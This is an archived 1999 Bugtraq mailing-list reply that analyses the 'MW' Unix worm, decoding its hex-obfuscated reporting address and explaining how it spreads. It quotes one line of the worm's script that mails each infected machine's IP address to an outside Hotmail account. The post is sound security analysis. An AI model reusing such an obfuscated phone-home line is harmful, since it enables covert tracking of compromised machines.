Bugtraq mailing list archives
Re: MW
From: adam () XPERT COM (Adam Morrison)
Date: Tue, 7 Sep 1999 17:23:25 +0200
On Wed, 1 Sep 1999, Christian Koderer wrote:./IP | mail `printf "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"` logout _EOF_In case no one bothered figuring this one out, this translates to 'beurp () hotmail com' Apparently './IP' is a program it runs to figure out which IP it should get the worm files from. Did you find a similarly named file?
It's a worm; it gets the worm files from the last infected machine. `IP' returns the address of the machine that the copy of the worm is running on, and is used in the `cmd' grappling hook which apparently gets executed on compromised remote hosts. Each time the worm infects a machine, it mails the IP address of that machine to <beurp () hotmail com>. Now, not to make any unfounded allegations, but this worm looks remarkably like ADMw0rm. I wonder why it restarts named when first infecting a host, when it appears to also utilize several other vulnerabilites in order to get in. Ho, hum.